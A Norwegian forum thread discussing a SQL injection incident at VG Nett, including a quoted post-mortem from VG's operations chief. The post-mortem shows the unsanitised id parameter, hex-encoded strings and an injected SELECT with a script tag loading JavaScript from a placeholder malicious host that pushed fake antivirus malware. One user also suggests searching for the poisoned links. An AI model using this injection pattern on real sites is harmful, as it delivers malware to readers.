Gå til innhold

VG Nett misbrukt

abene

Anbefalte innlegg

Videoannonse

Videoannonse
Annonse
>Jonas<

>Jonas<

Skrevet
Skrevet
Kan noen forklare hva slags feil VG egentlig har gjort? Dette er jo egentlig bare masse viss-vass uten noe konkret informasjon.

Slik jeg forstår det har det vært et sikkerhetshull i SQL-databsen til VG som har gjort det mulig for angripere å videresende lesere ved bruk av SQL injection. Det VG ikke har gjort er å tette dette sikkerhetshullet tidligere.

Lenke til kommentar
oslo72

oslo72

Skrevet
Skrevet (endret)

Er man hjernelobotomert hvis man ønsker å installere et antivirus-program når man får beskjed om at pc'n er infisert? Kalles heller normalt folkevett - DERSOM man er en vanlig pc-bruker og ikke en Hardware.no-leser :)

 

EDIT: Er det andre steder enn i hjernen man kan bli lobotomert? :)

Endret av oslo72
Lenke til kommentar
BearCat

BearCat

Skrevet
Skrevet

De som er litt tøffe, eller har et godt antivirus program kan sette følgende inn i et google søk:

vg reise chicago select

og trykke enter.

 

 

Hos meg, med FF og Avast, kommer det opp en advarsel allerede sammen med søkeresultatet.

Advarselen gjelder et javascript, som åpner maskinen for ytterligere angrep,

uten at man nødvendigvis er lobotomert...

Lenke til kommentar
JohndoeMAKT

JohndoeMAKT

Skrevet
Skrevet (endret)

Her er hva som skjedde:

Noen greide å få google til å indeksere et request mot en applikasjon hos VG hvor den skadelige koden lå i selve requestet. Ingenting gikk inn i selve databasen, og det gjalt bare én applikasjon av veldig mange som ikke vasket et inputparameter fra bruker. Siden ingenting gikk inn i databasen måtte du komme fra ett av disse requestene som google hadde indeksert for å få den ondsinnede koden.

 

Så denne trådens tittel om at "VG Nett misbrukt" stemmer mye bedre enn andres "VG Nett hacket".

Endret av JohndoeMAKT
Lenke til kommentar
BearCat

BearCat

Skrevet
Skrevet (endret)

Da mitt siste innlegg, hvor jeg linket direkte til bloggen til

Audun Ytterdal, driftsjef i VG Multimedia,

ble borte, så skal jeg quote hva som skjedde ifølge han:

 

Jeg fikk en telefon fra Watchcom som hadde funnet ut at noen kreative individer der ute på internett

benyttet seg av en feil på siden http://www.vg.no/reise/reisebrev.php?id=1 til å lure folk via søk på google til å installere et antivirusprodukt som egentlig var et virus

 

Hvordan fungerte det egentlig?

 

Reisebrev-applikasjonen var dessverre ikke kvalitetssikret godt nok før vi la det ut julen 2007

 

Variablen “id” her ble brukt direkte i en sql-spørring uten å bli “vasket” først. (dvs å passe på at “id” kun er et tall og ikke noe annet)

 

Det resulterte i at koden forsøkte å kjøre en sql-spørring og putte inn hva enn du skrev bak id=

 

Her kommer kreativiteten inn. Det lot seg ikke gjøre å legge inn data in databasen, men det gav muligheten til litt kreativ selecting og få resultatet ut på siden.

 

Klikk her for å se den orginale URL’en (Kan trigge antivirussoftwaren din)

 

http://pastebin.com/f7f7a573b

 

(jeg måtte legge det ekstern, hvis ikke ville folk få virusvarsel fra triggerhappy antivirussoftware hver gang folk kom inn på meta.vgb.no)

 

Mysql oversetter variabler som begynner med 0x til string automatisk. Her er en liten perlsnutt som gjør det samme:

 

$ echo 0x6672656520796fe756e67206769726c20706f726e |perl -lne 'print map {chr(hex($_))} /(..)/g'

 

free young girls porn

 

Så det er i praksis det samme som å si:

 

select 0,"free young girl porn",0,0,1,...."<script src="http://slemsite.com/slemtscript.php"></script>",0,1,.... from tabell"

 

Resultatet var at den første testsnutten ble vist på våre sider, og den andre som er javascript ble kjørt. Den lastet ned et slemt javascript fra en en ekstern site, som når det ble kjørt sendte deg til en annen ekstern. Der ble du fortalt at du hadde virus og forsøkte ganske aggressivt å få deg til å installere et antivirusprodukt som egentlig selv var et virus.

Hvordan fikk de folk til å besøke denne siden?

 

I og med at denne javascriptkoden kun blir kjørt hvis du encoder den inn i URL’en, og aldri befant seg på noen av VG’s maskiner, måtte de ha en måte å få folk til å klikke på slike linker.

 

De de da gjorde var å legge ut slike linker på mange steder rundt på internett. Etterhvert plukket Google og andre søkemotorer opp disse URL’ene og man fikk plutselig muligheten til å gjøre søk av type “reisebrev brazil free young girl porn” og få opp treff på de slemme URL’ene.

 

Det var aldri på noe tidspunkt en lenke til disse på VG Netts egne sider.

Endret av BearCat
Lenke til kommentar
Rascal

Rascal

Skrevet
Skrevet
De som er litt tøffe, eller har et godt antivirus program kan sette følgende inn i et google søk:

vg reise chicago select

og trykke enter.

 

 

Hos meg, med FF og Avast, kommer det opp en advarsel allerede sammen med søkeresultatet.

Advarselen gjelder et javascript, som åpner maskinen for ytterligere angrep,

uten at man nødvendigvis er lobotomert...

 

Så hvis jeg trykker linken og ingenting skjer med mitt AV program så fungerer AV programmet ikke? Eller er det fikset allerede?

Lenke til kommentar
Theo343

Theo343

Skrevet
Skrevet (endret)
Kan noen forklare hva slags feil VG egentlig har gjort? Dette er jo egentlig bare masse viss-vass uten noe konkret informasjon.

Slik jeg forstår det har det vært et sikkerhetshull i SQL-databsen til VG som har gjort det mulig for angripere å videresende lesere ved bruk av SQL injection. Det VG ikke har gjort er å tette dette sikkerhetshullet tidligere.

Jeg også vet hva en SQL injection er og fikk med meg dens rolle i artikkelen, men VG har i grunn ikke gjort noe direkte feil her. Saken er at de har unngått å oppdatere eller ikke har hatt ressurser nok til god nok drift, som gjelder de fleste i dag har jeg inntrykk av. Endret av Theo343
Lenke til kommentar
BearCat

BearCat

Skrevet
Skrevet (endret)

Dersom ingenting trigges i ditt AV program, så håper jeg at de har ordnet problemet,

ellers så er ikke ditt AV program brukbart :thumbdown:

du skal som sagt få en advarsel dersom AV programmet oppdager noe snusk.

 

ps.

jeg får ikke lenger opp ovennevnte advarsel, noe som tyder på at problemet er fikset.

Endret av BearCat
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
Gå til emneliste
×
×
  • Opprett ny...